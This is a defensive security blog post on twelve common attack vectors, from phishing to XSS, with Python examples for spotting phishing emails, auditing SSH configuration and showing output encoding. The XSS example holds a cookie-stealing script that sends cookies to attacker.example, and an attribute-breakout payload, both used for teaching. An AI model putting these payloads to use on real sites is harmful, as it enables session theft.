An attack vector is a path or means by which a cyber criminal can gain unauthorized access to a network or system. Understanding the common attack vectors is a good place to start, especially with the average cost of a breach now over $4 million, and it can help you protect yourself and your organization from becoming the next victim.
In this blog post, we’ll take a look at 12 common attack vectors that threat actors use in an attempt to infiltrate their target. After all, it’s best to be prepared!
What is the difference between an attack vector and an attack surface?
An attack vector is a method used to gain unauthorized (and often privileged) access to networks, systems, IoT devices, and other IT infrastructure. In other words, an attack vector is the route by which an attacker reaches and exploits a vulnerability, and a successfully used one leads to a security incident.
The attack surface, on the other hand, refers to the sum of all possible attack vectors.
Why do cyber criminals exploit attack vectors?
An attack vector provides an avenue for a cyber criminal to infiltrate a system, steal information, or disrupt service. The primary motivator of cyber attacks is monetary gain, but this isn’t always the case. Attack vectors are often discussed in terms of the CIA triad: confidentiality, integrity, and availability. A successful attack achieves the desired result by violating at least one of the three principles.
What are the most common attack vectors?
Social engineering
98% of the cyber attacks we see today come from instances of social engineering. This refers to the use of deception (usually by exploiting the target’s trust or helpfulness) to manipulate someone into divulging sensitive information or performing an action that benefits the attacker. Examples of social engineering attacks include baiting, scareware, pretexting, tailgating, and phishing.
Phishing is the most common social engineering technique and uses a disguised email (or, increasingly, a text message or phone call) as the weapon. The term is a play on the word “fishing”: the attacker casts out bait, such as a message that appears to be from a bank or a colleague, and waits for someone to bite by clicking a link, opening an attachment, or entering credentials on a fake page.
Business email compromise (BEC) is a targeted form of phishing in which the attacker impersonates someone the recipient trusts, such as an executive, a colleague, or a supplier, and asks for an action: paying an invoice, changing a vendor’s bank account details, or sending sensitive documents. Many BEC messages carry no link or attachment at all, which is why they slip past filters that look only for malicious content. Since social engineering scams are crafted to look legitimate, it can be easy for people to be fooled by them.
Email scams and attachments
Following on from our previous point, email attachments can be a huge danger to your business (and personal life). They are a popular way for cyber attackers to compromise systems and steal data – easy to execute and carry out at scale. With more than 281 billion emails sent every day, it’s an efficient way to reach a large number of victims quickly.
An email scam is when a cyber criminal sends an email that appears to be from a legitimate source in the hope of stealing sensitive data or money, infecting your computer with malware through an attachment, or getting you to click a link that takes you to a fraudulent site.
With a wide variety of different attacks ranging from phishing to malware, these threats come in all shapes and sizes. The anatomy of malicious emails varies, but they usually:
- Are either riddled with typos and grammatical errors or near-perfect masquerades of trusted institutions (like PayPal); the sender address and its domain are often the giveaway, so check them rather than just the display name
- Convey urgency, with calls to action such as “Act now!” or a deadline after which an account will supposedly be suspended
- Lack a personal greeting, since most legitimate companies address their customers by name (though a personalised greeting is no guarantee: attackers who already have your name will use it)
- Request bank details, passwords, or other personal information that a legitimate organisation would not ask for by email
Because people can be persuaded into opening attachments or clicking links in social engineering attempts like these, scammers often succeed.
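As an added illustration of the indicators listed above (example code written for this article, not a tool the post describes), the following Python function checks a raw email message for a few of them: a Reply-To domain that differs from the sender’s, urgent wording, a request for sensitive data, a generic greeting, and a link whose visible text names a different host than its real destination. Both messages are constructed for the example and the hostnames in them are placeholders; a real mail gateway would weigh many more signals (SPF, DKIM and DMARC results, sender reputation, attachment analysis) than this heuristic does.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser

# Constructed sample messages (not real mail). The first shows several of the
# indicators discussed above; the second is what a routine vendor email looks like.
SAMPLE_PHISH = """\
From: "PayPal Support" <billing@paypa1-secure.example>
Reply-To: collect@mailbox-relay.example
To: victim@example.org
Subject: Act now! Your account will be suspended
Content-Type: text/html

<p>Dear customer,</p>
<p>Please confirm your bank details within 24 hours or your account will be
suspended: <a href="http://198.51.100.7/login">https://www.paypal.com/login</a></p>
"""

SAMPLE_LEGIT = """\
From: "Acme Billing" <billing@acme.example>
To: alice@example.org
Subject: Your March invoice is ready
Content-Type: text/html

<p>Hi Alice,</p>
<p>Your March invoice is on your account page:
<a href="https://billing.acme.example/invoices">billing.acme.example</a></p>
"""

URGENCY = re.compile(r"\b(act now|immediately|within 24 hours|suspended|urgent)\b", re.I)
SENSITIVE = re.compile(r"\b(bank details|password|card number|ssn)\b", re.I)
GENERIC_GREETING = re.compile(r"^(dear|hello|hi)\s+(customer|user|member|sir|madam)\b", re.I)
LOOKS_LIKE_URL = re.compile(r"^(https?://)?[\w.-]+\.[a-z]{2,}", re.I)


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url):
    """Host part of a URL or bare hostname, lower-cased."""
    m = re.match(r"^(?:https?://)?([^/\s]+)", url)
    return m.group(1).lower() if m else ""


def phishing_indicators(raw_message):
    """Return a list of human-readable indicators found in the message."""
    msg = message_from_string(raw_message)
    body = msg.get_payload()
    findings = []

    _, sender = parseaddr(msg.get("From", ""))
    _, reply_to = parseaddr(msg.get("Reply-To", ""))
    if reply_to and reply_to.rsplit("@", 1)[-1].lower() != sender.rsplit("@", 1)[-1].lower():
        findings.append("Reply-To domain differs from the sender domain")

    if URGENCY.search(msg.get("Subject", "") + " " + body):
        findings.append("urgent call to action")
    if SENSITIVE.search(body):
        findings.append("asks for bank details or other sensitive data")

    text = re.sub(r"<[^>]+>", "", body).strip()
    first_line = text.splitlines()[0] if text else ""
    if GENERIC_GREETING.match(first_line):
        findings.append("generic greeting instead of the recipient's name")

    collector = LinkCollector()
    collector.feed(body)
    for href, visible in collector.links:
        if LOOKS_LIKE_URL.match(visible) and host_of(visible) != host_of(href):
            findings.append(f"link text {visible!r} hides destination {host_of(href)!r}")
    return findings


if __name__ == "__main__":
    for name, sample in (("phish", SAMPLE_PHISH), ("legit", SAMPLE_LEGIT)):
        print(name, phishing_indicators(sample))
```

Run as a script it prints five findings for the constructed phishing message and none for the routine invoice. The link check is the one worth copying: the visible text of a link is whatever the attacker wants it to be, so it is the `href` that matters, and a mismatch between the two is a strong signal on its own.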
Compromised or weak credentials
With the wider use of multiple accounts and devices, people have become increasingly careless about protecting their credentials. A weak password is an open door to cyber criminals – attackers can gain access to your private information, steal your data, and even commit identity theft. With reused passwords, if a hacker compromises one set of credentials, they can do the same to other accounts.
Password managers and multi-factor authentication are critical to reducing the risk of a credential-based breach: a manager makes a unique, random password for every account practical, and MFA means a stolen or guessed password is not enough on its own.
Unsecured wifi networks
Have you ever connected to an internet hotspot in a coffee shop, hotel, or maybe airport? Have you wondered whether it was safe to do so? When using unsecured public wifi networks, it’s the same thing as having a conversation in a crowded room. You have no way of knowing who else is listening in, and the same goes for your data.
The idea is that when customers have access to the internet, they’ll sit around longer spending more money. But what many businesses don’t always realize is that providing public wifi actually puts their customers at risk of being hacked.
When you connect to an open public wifi network, anyone nearby can capture the traffic on it, and whoever runs the access point (or a rogue access point broadcasting the same name) can read and tamper with anything that is not encrypted end to end. HTTPS protects the content of most web traffic today, but the attacker can still see which hosts you connect to, intercept anything sent over plain HTTP or unencrypted DNS, and present fake captive-portal or login pages to harvest credentials. Whether you are shopping online or sending emails, a session on a hostile network can cost you usernames, passwords, or card numbers; a VPN or, at minimum, refusing to proceed past certificate warnings removes most of that exposure.
Outdated software and operating systems
You might not think about it, but the software, operating systems, and hardware you use every day are just as susceptible to security vulnerabilities. Organizations often fall victim to security incidents because they have unpatched software and/or operating systems.
The Equifax breach was the result of a known vulnerability in the organization’s web application framework (Apache Struts) for which a patch had been available for months but was not applied. Similarly, the massive WannaCry ransomware outbreak in 2017 infected roughly 200,000 computers running Windows systems that had not applied the SMB patch Microsoft had released two months earlier, some of them on versions of Windows that Microsoft no longer supported at all.
When developing your company’s cyber security strategy, it’s important to evaluate everything from your routers to your servers and workstations. For most, this is a considerable challenge because they have many different types of hardware and software applications. The bigger the business, the harder it is to manage threats.
Ransomware
Ransomware is a form of extortion in which data is encrypted, and increasingly also stolen and threatened with publication, unless a ransom is paid. The number of these attacks has skyrocketed over the last few years, demonstrating one thing: there is no industry that’s immune from this crime. WannaCry’s attack was felt worldwide, targeting computers running the Windows operating system and demanding payment in Bitcoin.
The FBI recommends that you not pay up: paying funds and encourages further attacks, marks you as a victim willing to pay and so more likely to be targeted again, and does not guarantee that you will receive a working decryption key. Tested, offline backups and a rehearsed recovery plan are what make refusing to pay a realistic option.
Third-party breaches
Third-party vendors are outside organizations that provide services or materials for your company: suppliers and distributors, but also cloud and software-as-a-service providers, managed IT providers, contractors, and anyone else with a connection into your systems or a copy of your data.
The risk associated with each vendor is unique, but it’s important for your organization to understand the inherent risks associated with each vendor relationship because these relationships can significantly increase the risk of a cyber security incident.
After all, not only does the security of your data heavily depend on the security measures put in place by your vendors, but also their partners’ and suppliers’ security measures. And if one of them fails? You’re at risk and so is your business.
Configuration weaknesses
Misconfiguration is one of the most common root causes of security incidents. It covers everything from settings that directly expose data (a storage bucket or database listening to the whole internet) to small mistakes that let an attacker into your infrastructure without your knowledge (a default password that was never changed, a debug interface left enabled in production).
The best defence is attention to detail: know what a secure baseline looks like for each system you run, compare the live configuration against it regularly, and treat every deviation as something to explain or fix. Common misconfigurations include:
- Accidental exposure of sensitive information, such as credentials left in configuration files, source repositories, or error messages.
- Overly permissive access rights, such as allowing all users (or the public) to read or modify a resource that only a few people should reach.
- Unnecessary services, default accounts, and management interfaces left reachable, giving attackers an easy entry point into a system.
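As an added example (code written for this article, not from the original post), here is a small audit of an OpenSSH server configuration against a baseline. The two configuration fragments are constructed for the example, and the baseline values are a common hardening choice rather than an official benchmark. The same approach, parse the effective configuration and diff it against an expected state, applies equally to web server settings, cloud storage policies, and database parameters.

```python
# Constructed sshd_config fragments for the example (not taken from a real host).
WEAK_SSHD = """\
# Install-time configuration nobody revisited
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PermitEmptyPasswords yes
X11Forwarding yes
"""

HARDENED_SSHD = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
PermitEmptyPasswords no
PubkeyAuthentication yes
X11Forwarding no
MaxAuthTries 3
"""

# Expected state. A string means "must equal"; an int means "must be at most".
# A directive that is absent falls back to OpenSSH's compiled-in default, which
# for PasswordAuthentication is the permissive value, so absence is reported
# rather than silently passed.
BASELINE = {
    "permitrootlogin": "no",
    "passwordauthentication": "no",
    "permitemptypasswords": "no",
    "pubkeyauthentication": "yes",
    "x11forwarding": "no",
    "maxauthtries": 4,
}


def parse_sshd_config(text):
    """Return {directive_lowercased: value}, ignoring comments and blank lines.

    sshd uses the first occurrence of a directive, so a later duplicate does
    not override an earlier one; setdefault() mirrors that behaviour.
    """
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        conf.setdefault(key, value)
    return conf


def audit_sshd(text, baseline=BASELINE):
    """Return a list of deviations from the baseline (an empty list means clean)."""
    conf = parse_sshd_config(text)
    findings = []
    for key, want in baseline.items():
        got = conf.get(key)
        if got is None:
            findings.append(f"{key}: not set (compiled-in default applies), want {want}")
        elif isinstance(want, int):
            if not got.isdigit() or int(got) > want:
                findings.append(f"{key}: is {got!r}, want at most {want}")
        elif got.lower() != want:
            findings.append(f"{key}: is {got!r}, want {want!r}")
    return findings


if __name__ == "__main__":
    print("weak:", audit_sshd(WEAK_SSHD))
    print("hardened:", audit_sshd(HARDENED_SSHD))
```

The weak fragment produces six findings, including two for directives that are simply missing; the hardened one produces none. The parser deliberately ignores `Match` blocks, which can override directives for particular users or addresses, so on a real host you would audit the output of `sshd -T` (the effective configuration) rather than the file itself.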
Zero-day vulnerabilities
A zero-day vulnerability is a flaw in software that is being exploited, or for which exploit code exists, before the developer has a fix available. The term comes from the notion that the developer has had ‘zero days’ to prepare once the flaw becomes known or an exploit is released into the wild; that window between exploitation and a patch is what makes these flaws so valuable.
The primary goal of zero-day attacks is usually to gain unauthorized access to a computer system or network. The term is also applied loosely to ‘zero-day malware’, meaning malicious code that is new enough that signature-based defences do not yet detect it.
An attacker can use a zero-day exploit against systems that have no patch to apply, giving them an opportunity to steal data or install other malicious software on a victim’s computer. A discoverer might also sell the exploit to a broker or on darknet markets, or keep it private so they are the only ones able to use it. Once the vendor ships a fix the flaw is no longer a zero-day, but the exploit keeps working against everyone who has not applied the patch, which is why the outdated-software vector above matters so much.
Distributed Denial of Service (DDoS)
The DDoS attack is one of the most common forms of cyber attack. It is a technique used to make websites, servers, or whole networks unavailable to the users who depend on them.
The attack works by overwhelming the target with more traffic, connections, or requests than it can handle, so legitimate users can no longer get through. It sounds simple, but DDoS attacks are becoming increasingly sophisticated and difficult to defend against: raw floods from botnets of compromised devices are the crude form, while amplification attacks (small spoofed queries sent to open DNS or NTP servers that answer with much larger responses) and application-layer floods that mimic real requests are far harder to filter. Defending against them usually means upstream filtering or a scrubbing service rather than anything the target server can do alone.
SQL injections
Injection attacks are common, and SQL injection is the top application-layer web attack. It occurs when an application builds a database query by concatenating untrusted input into the SQL text, which lets an attacker change the meaning of the query. The result can be reading data such as usernames and password hashes, bypassing authentication, modifying or deleting records, and in some configurations running commands on the database server itself.
SQL injection is straightforward to prevent in new code: use parameterised queries (prepared statements) everywhere, so that user input is passed to the database as a value and never parsed as SQL. The difficulty is finding every place an existing application builds queries dynamically, especially in large codebases that talk to several databases; code review, static analysis, and testing with malformed input are the usual ways to track those down.
Cross-Site Scripting (XSS)
XSS attacks are another type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. An XSS attack occurs when an attacker uses a web application to deliver malicious code, generally a browser-side script, to a different end user, whose browser then runs it in the context of the trusted site, with access to that site’s cookies, session, and page content.
Flaws that allow these attacks are widespread and occur anywhere a web application includes user-supplied input in the output it generates without validating or encoding it for the context where it lands: the HTML body, an attribute value, a JavaScript string, and a URL each require different encoding, and encoding for the wrong one leaves the hole open. A Content Security Policy is a useful second layer, limiting what an injected script can do if one does slip through.
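The following added example (written for this article, not code from the original post) shows a reflected search term rendered with and without output encoding in two contexts, the HTML body and a quoted attribute, and uses Python’s HTML parser as a stand-in for a browser to check whether the resulting markup contains anything executable. The payloads and the attacker hostname are constructed for the example.

```python
from html import escape
from html.parser import HTMLParser

# Constructed payloads for the example. The first is a classic cookie-stealing
# script; the second is built for an attribute context and carries no <script>.
SCRIPT_PAYLOAD = '<script>location="http://attacker.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.domain)'


def render_vulnerable(term):
    """Reflects the search term into the page body as-is."""
    return f"<p>Results for: {term}</p>"


def render_safe(term):
    """Encodes &, <, >, and both quote characters so the browser shows the term as text."""
    return f"<p>Results for: {escape(term, quote=True)}</p>"


def render_attr_vulnerable(term):
    """Attribute context with no encoding: a quote in the input closes the attribute."""
    return f'<input name="q" value="{term}">'


def render_attr_safe(term):
    """Attribute context: encoding is sufficient here only because the value is quoted."""
    return f'<input name="q" value="{escape(term, quote=True)}">'


class ExecutableMarkup(HTMLParser):
    """Flags what a browser would execute: a <script> element or an on* event handler."""

    def __init__(self):
        super().__init__()
        self.executable = False

    def handle_starttag(self, tag, attrs):
        if tag == "script" or any(name.lower().startswith("on") for name, _ in attrs):
            self.executable = True


def would_execute(markup):
    """True if the markup contains script that a browser would run."""
    parser = ExecutableMarkup()
    parser.feed(markup)
    return parser.executable


if __name__ == "__main__":
    cases = (
        (render_vulnerable, SCRIPT_PAYLOAD),
        (render_safe, SCRIPT_PAYLOAD),
        (render_attr_vulnerable, ATTR_PAYLOAD),
        (render_attr_safe, ATTR_PAYLOAD),
    )
    for fn, payload in cases:
        print(f"{fn.__name__}: executes={would_execute(fn(payload))}")
```

The attribute payload is the instructive one: it contains no `<script>` tag and would pass a naive filter that only strips those, yet in the unencoded attribute it breaks out of the value and adds an `onfocus` handler. The same escaping that works for the body and a quoted attribute is not enough for a JavaScript string or a URL, which is why templating engines provide context-specific encoders.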
Find and eliminate your attack vectors
Widespread cyber attacks that we increasingly see in the news are an unfortunate reality in the age of digital data. And while these breaches have had a significant impact on society, they also provide an opportunity to learn how to better protect ourselves from cyber threats.
In the never-ending quest to keep our data and systems safe, it’s vital for organizations to value good cyber hygiene and understand risk. However, this has become a serious challenge as the attack surface grows constantly. Awareness of the most common attack vectors is a good place to start – it’s time to arm yourself with the knowledge you need to protect your organization.